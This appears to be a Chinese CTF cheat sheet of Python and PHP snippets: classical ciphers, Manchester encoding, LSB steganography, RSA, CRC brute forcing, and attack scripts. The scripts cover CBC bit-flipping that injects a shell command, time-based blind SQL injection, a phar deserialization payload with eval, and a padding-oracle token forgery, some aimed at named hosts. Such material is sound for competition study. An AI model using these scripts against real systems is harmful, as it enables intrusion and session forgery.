首先推荐这篇文章,网上有多次转载,这是我见过日期比较早的 CTF中那些脑洞大开的编码和加密
凯撒密码
1 flag='flag{abcdef}' 2 c='' 3 n=20 4 for i in flag: 5 if 'a' <= i <='z': 6 i=chr(((ord(i)-ord('a'))+n)%26+ord('a')) 7 c+=i 8 print c
栅栏密码
1 n= 5 2 m = "flag{0123456789abcdef}" 3 c='' 4 for x in range(n): 5 for i in range(len(m)): 6 if((n - i + x) % n == 0): 7 c+=m[i] 8 print c 9 10 n=5 11 m='' 12 c=list(c) 13 zero=(n-len(c))%n 14 n=(len(c)+zero)/n 15 if zero != 0: 16 for i in range(1,zero): 17 c.insert(-n*i+1,'0') 18 c.append('0') 19 for x in range(n): 20 for i in range(len(c)): 21 if((n - i + x) % n == 0): 22 m+=c[i] 23 if zero!= 0: 24 m=m[:-zero] 25 print m
曼彻斯特编码与解码
1 flag = bin(int('flag{0123456789abcdef}'.encode('hex'),16))[2:] 2 s='00' 3 for i in range(len(flag)): 4 if flag[i]=='1': 5 s+='10' 6 else: 7 s+='01' 8 print hex(int(s,2))[2:-1] 9 #296969a56956696a6a9a5a555a565a595a5a5a655a665a695a6a5a955a9669566959695a6965696669696aa6 10 r="" 11 for i in range(len(s)/2): 12 if s[i*2:i*2+2] == '10': 13 r += '1' 14 else: 15 r += '0' 16 print hex(int(r,2))[2:-1].decode('hex') 17 #flag{0123456789abcdef}
差分曼彻斯特编码与解码
1 #coding=utf-8 2 flag = bin(int('flag{0123456789abcdef}'.encode('hex'),16))[2:] 3 s='01' # or '10' 4 for i in range(len(flag)): 5 if flag[i]=='1': 6 s+=s[-2:][::-1] 7 else: 8 s+=s[-2:] 9 print hex(int(s,2))[2:-1] 10 #6565659565569a99665959555956a6a55959596aa696a69aa69959aaa6569aa9655a9aa69a95656965656669 11 r="" 12 tmp = 0 13 for i in xrange(len(s)/2): 14 c = s[i*2] 15 if c == s[i*2 - 1]: 16 r += '1' 17 else: 18 r += '0' 19 print hex(int(r,2))[2:-1].decode('hex') 20 #flag{0123456789abcdef}
lsb隐写
1 #coding=utf-8 2 from PIL import Image 3 import binascii 4 import random 5 6 im_path = 'timg.jpg' 7 im = Image.open(im_path) 8 width, height = im.size 9 newImg = Image.new("RGBA",(width, height),(255,255,255,120)) 10 for i in range(0,height): 11 for j in range(0,width): 12 a,b,c=im.getpixel((j,i)) 13 newImg.putpixel((j,i),(a,b,c,180)) 14 newImg.save('new.bmp','PNG') 15 16 flag=binascii.b2a_hex('flag{123456}') 17 flag= bin(int(flag,16))[2:] 18 flag= '0'*(8-len(flag)%8)+flag 19 print flag 20 21 newImg = Image.new("RGB",(width, height),(0,0,0)) 22 for i in range(0,height): 23 for j in range(0,width): 24 a,b,c=im.getpixel((j,i)) 25 try: #将末尾像素置0后写入 26 newImg.putpixel((j,i),(a-a%2+int(flag[i*width+j]),b-b%2+int(flag[i*width+j]),c-c%2+int(flag[i*width+j]))) 27 except: 28 try: #其余像素奇偶随机 29 newImg.putpixel((j,i),(a-random.randint(0,1),b-random.randint(0,1),c-random.randint(0,1))) 30 except: 31 newImg.putpixel((j,i),(a,b,c)) 32 newImg.save('new.png','PNG')
cbc字节翻转攻击
1 import requests 2 enc='2363303cf2fae8b1bbe443fe2d12947e5abcf9c0ceb12ce5fd3a43504de0bf0621b9917a715dad17f828ff0ace6ec816'.decode('hex') 3 m='Welcome to the code system!This is a test string' 4 fake='uu=admin&ff=php://input&ccc=nl *' 5 6 iv=enc[16:32] 7 m1=m[32:] 8 fake1=fake[16:] 9 fake_iv='' 10 11 for i in range(16): 12 fake_iv+=chr(ord(iv[i])^ord(fake1[i])^ord(m1[i])) 13 enc=enc[:16]+fake_iv+enc[32:] 14 15 m=requests.get('http://race.taropowder.cn:20002/?s='+enc.encode('hex')).content 16 17 iv=enc[:16] 18 m2=m[16:32] 19 fake2=fake[:16] 20 21 fake_iv='' 22 for i in range(16): 23 fake_iv+=chr(ord(iv[i])^ord(fake2[i])^ord(m2[i])) 24 enc=fake_iv+enc[16:] 25 26 m=requests.post('http://race.taropowder.cn:20002/?s='+enc.encode('hex'),data='phpinfo').content 27 28 print m
flask session伪造
1 from flask import Flask, session 2 import uuid 3 import urllib.request 4 app = Flask(__name__) 5 app.config['SECRET_KEY']='123456' 6 7 8 @app.route('/') 9 def index(): 10 session['username']='user' 11 session['isadmin']='1' 12 return 'hello' 13 14 if __name__ == "__main__": 15 app.run(debug=True,port=8000,host="0.0.0.0")
RSA demo
1 from gmpy2 import * 2 e=65537 3 p=56225103425920179745019828423382255030086226600783237398582720244250840205090747144995470046432814267877822949968612053620215667790366338413979256357713975498764498045710766375614107934719809398451422359883451257033337168560937824719275885709824193760523306327217910106187213556299122895037021898556005848927 4 q=56225103425920179745019828423382255030086226600783237398582720244250840205090747144995470046432814267877822949968612053620215667790366338413979256357713975498764498045710766375614107934719809398451422359883451257033337168560937824719275885709824193760523306327217910106187213556299122895037021898556005848447 5 n=p*q 6 c=631583911592660652215412683088688785438938386403323323131247534561958531288570612134139288090533619548876156447498627938626419617968918299212863936839701943643735437264304062828205809984533592547599060829451668240569384130130080928292082888526567902695707215660020201392640388518379063244487204881439591813398495285025704285781072987024698133147354238702861803146548057736756003294248791827782280722670457157385205787259979804892966529536902959813675537028879407802365439024711942091123058305460856676910458268097798532901040050506906141547909766093323197363034959926900440420805768716029052885452560625308314284406 7 x=long((p-1) * (q-1)) 8 d= invert(e,x) 9 m=pow(c,d,n) 10 print hex(m)[2:].decode('hex')
SQL注入辅助
import requests import time url='http://172.16.124.149/Less-10/?id=' flag='' for i in range(1,20): left=33 right=128 while right-left!=1: mid=(left+right)/2 payload='0"^(substr((select+binary+flag+from+flag.flag),{i},1)>binary+{mid}+and+sleep(0.02))%23'.format(i=i,mid=hex(mid)) t1=time.time() r=requests.get(url=url+payload) t2=time.time() if t2-t1 > 0.2: left=mid else: right=mid flag+=chr(right) print flag
phar反序列化demo
<?php //把要进行反序列化的对象放在此处 class foo { var $ha = 'echo "ok";'; function __destruct() { eval($this->ha); } } //生成对应可被利用的对象 $o = new foo(); $o->ha='echo "error";'; @unlink("phar.phar"); $phar = new Phar("phar.phar"); $phar->startBuffering(); $phar->setStub("GIF89a"."<?php __HALT_COMPILER(); ?>"); //设置stub,增加gif文件头用以欺骗检测 $phar->setMetadata($o); //将自定义meta-data存入manifest $phar->addFromString("test.txt", "test"); //添加要压缩的文件 //签名自动计算 $phar->stopBuffering(); ?>
padding oracel
import requests import urllib host='124.193.74.211' port='55769' #host='127.0.0.1' #port='80' url='http://%s:%s/login.php'%(host,port) session = requests.session() session.post(url=url,data={'username':'admin','password':'admin'}) im=[] for i in range(1,17): try: s='' xx='' for j in im[::-1]: xx+=chr(i^j) for j in range(256): s='xff'*(16-i)+chr(j)+xx s=s.encode('base64') session.cookies.set('token',urllib.quote(s),domain=host,path='/') x=session.get(url).text if 'Error' not in x: im.append(j^i) print s.decode('base64').encode('hex') break print im except Exception as e: print e,' ' for j in range(256): s='x0f'*15 token='' for i in range(15): token+=chr(im[::-1][i]^ord(s[i])) token=chr(j)+token token=token.encode('base64') session.cookies.set('token',urllib.quote(token),domain=host,path='/') x=session.get(url).text if 'Error' in x: im.append(j^ord('0')) print im break im=im[::-1] s='onepiece'+chr(8)*8 token='' for i in range(16): token+=chr(im[i]^ord(s[i])) token=token.encode('base64')[:-1] session.cookies.set('token',urllib.quote(token),domain=host,path='/') x=session.get(url).text print session.cookies,x
爆破图片crc
import binascii for i in range(16**4): i=hex(i)[2:].zfill(4) for j in range(16**4): j=hex(j)[2:].zfill(4) s= '%08x' % (binascii.crc32('IHDR'+'0000{i}0000{j}0802000000'.format(i=i,j=j).decode('hex')) & 0xffffffff) if s=='53d1578a': print 'x:',i,'y:',j,'crc:',s print 'x:',i